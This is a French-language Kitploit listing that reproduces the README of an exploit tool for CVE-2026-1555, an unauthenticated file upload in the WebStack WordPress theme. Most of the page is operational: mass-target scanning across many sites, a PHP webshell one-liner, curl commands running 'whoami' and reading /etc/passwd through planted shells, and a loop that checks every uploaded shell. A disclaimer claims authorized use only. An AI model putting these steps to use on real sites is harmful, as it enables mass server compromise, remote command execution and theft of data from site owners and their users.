Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1555 — WebStack <= 1.2024 - Téléversement de fichier arbitraire non authentifié | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-1555
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubnxploited/cve-2026-1555

CVE-2026-1555

WebStack <= 1.2024 - Téléversement de fichier arbitraire non authentifié

Voir le dépôt
91il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-1555

WebStack <= 1.2024 - Téléchargement arbitraire de fichier non authentifié

👤 By: Nxploited

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


💀 CVE-2026-1555 — WebStack WordPress : téléchargement arbitraire de fichier

Exécution de code à distance non authentifiée via le gestionnaire AJAX img_upload

Python CVE CVSS Auth


📌 Aperçu de la vulnérabilité

🔬 Cause racine technique

La fonction io_img_upload() enregistrée sous le hook d'action img_upload de admin-ajax.php dans WordPress n'effectue aucune validation du type de fichier ou de l'extension avant d'écrire le fichier téléchargé sur le serveur. Comme l'action est enregistrée sans contrôle d'authentification (wp_ajax_nopriv_), tout attaquant distant non authentifié peut envoyer un fichier arbitraire — y compris un webshell PHP — et le serveur le stockera dans un chemin accessible publiquement, permettant une exécution de code à distance directe.

Point de terminaison vulnérable :

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>

⚙️ Fonctionnalités de l'outil

  • 🔁 Analyse multi-thread avec nombre de travailleurs configurable
  • 📋 Prise en charge de cibles en masse via un fichier de liste de cibles
  • 📤 Extraction automatique de l'URL du shell depuis la réponse JSON
  • 💾 URLs de shell réussies enregistrées dans uploaded_paths.txt
  • 🎨 Interface terminal riche avec suivi de progression en direct
  • 🔕 Vérification SSL désactivée pour une compatibilité maximale

📦 Prérequis

Version de Python : 3.8+

Installer les dépendances :

root@kitploit:~
pip install requests rich urllib3

🚀 Utilisation

1. Préparez votre liste de cibles

Créez un fichier nommé list.txt (ou tout autre nom de votre choix) avec une cible par ligne :

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

Les cibles sans http:// ou https:// reçoivent automatiquement le préfixe http://.

2. Préparez votre charge utile

Placez votre webshell dans le même répertoire que le script. Exemple :

root@kitploit:~
# Minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

3. Lancez l'outil

root@kitploit:~
python CVE-2026-1555.py

Les informations suivantes vous seront demandées :


📤 Sortie et extraction du shell

Sortie en direct

Chaque téléchargement réussi affiche :

root@kitploit:~
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful                              │
│                                                │
│ Target:    https://target.com                  │
│ Shell URL: https://target.com/wp-content/...   │
╰────────────────────────────────────────────────╯

Résultats enregistrés

Toutes les URLs de shell réussies sont ajoutées à :

root@kitploit:~
uploaded_paths.txt

Accéder à votre shell

Après un téléchargement réussi, accédez au shell directement via le navigateur ou curl :

root@kitploit:~
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id

# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"

# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"

Le chemin de téléchargement exact est extrait de la réponse JSON du serveur (data.src) et affiché automatiquement.

Vérification en masse des shells

Vérifiez rapidement tous les shells téléchargés à partir du fichier de sortie :

root@kitploit:~
while read url; do
  echo -n "[*] $url -> "
  curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt

📊 Résumé de la sortie

À la fin de chaque exécution, un résumé est affiché :

root@kitploit:~
Summary  50/50  OK: 12  FAIL: 38
╭──────────────────────────────────────────╮
│  Shell URLs saved to uploaded_paths.txt  │
╰──────────────────────────────────────────╯

🗂️ Structure des fichiers

root@kitploit:~
CVE-2026-1555.py       ← Script d'exploitation principal
list.txt               ← URLs cibles (une par ligne)
shell.php              ← Charge utile à téléverser
uploaded_paths.txt     ← Généré automatiquement : URLs de shell réussies

⚠️ Avertissement

Cet outil est fourni strictement à des fins de tests d'intrusion autorisés, de recherche en sécurité et d'éducation uniquement.

L'auteur — Nxploited — n'assume aucune responsabilité en cas d'utilisation abusive, de dommages ou d'activités illégales menées avec cet outil. En utilisant cet outil, vous confirmez disposer d'une autorisation écrite explicite pour tester tous les systèmes cibles.

Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale et peut entraîner des poursuites pénales en vertu des lois applicables sur la cybercriminalité.

Utilisez-le de manière responsable. Vous êtes seul responsable de vos actions.


👤 Auteur : Nxploited 📣 Chaîne : Nxploited ZeroDay Hub 💬 Telegram : @KNxploited

Télécharger l’outil
ChampDétail
Identifiant CVECVE-2026-1555
Composant affectéThème WebStack pour WordPress
Versions vulnérablesToutes les versions jusqu'à 1.2024 incluse
Type de vulnérabilitéTéléchargement arbitraire de fichier → Exécution de code à distance
Authentification requise❌ Aucune (non authentifiée)
Score CVSS9.8 CRITIQUE
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
InviteDescriptionDéfaut
Targets fileChemin vers votre liste de cibleslist.txt
ThreadsNombre de travailleurs simultanés6
Local file to uploadNom du fichier de votre charge utile (dans le répertoire du script)shell.php